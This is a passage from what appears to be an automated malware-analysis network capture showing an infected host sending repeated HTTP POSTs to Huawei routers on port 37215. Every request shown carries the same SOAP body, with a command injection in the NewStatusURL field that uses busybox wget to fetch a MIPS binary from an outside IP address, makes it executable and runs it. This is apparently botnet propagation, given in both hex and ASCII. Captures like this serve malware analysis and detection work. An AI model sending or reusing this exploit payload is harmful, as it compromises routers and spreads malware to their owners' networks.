                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            130192.168.2.1454622156.155.120.1137215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.675302029 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            131192.168.2.143934641.225.163.16937215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.675323009 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            132192.168.2.1451960197.168.230.9437215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.675323963 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            133192.168.2.1455032197.95.168.1737215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.675374985 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            134192.168.2.1434844197.237.52.10837215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.675404072 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            135192.168.2.145413841.16.196.2937215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.675404072 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            136192.168.2.1458974197.228.135.20037215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.675424099 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            137192.168.2.144701241.148.2.7237215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.675705910 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            138192.168.2.1454048197.142.78.12037215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.675771952 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            139192.168.2.1455450197.136.147.20837215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.675802946 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
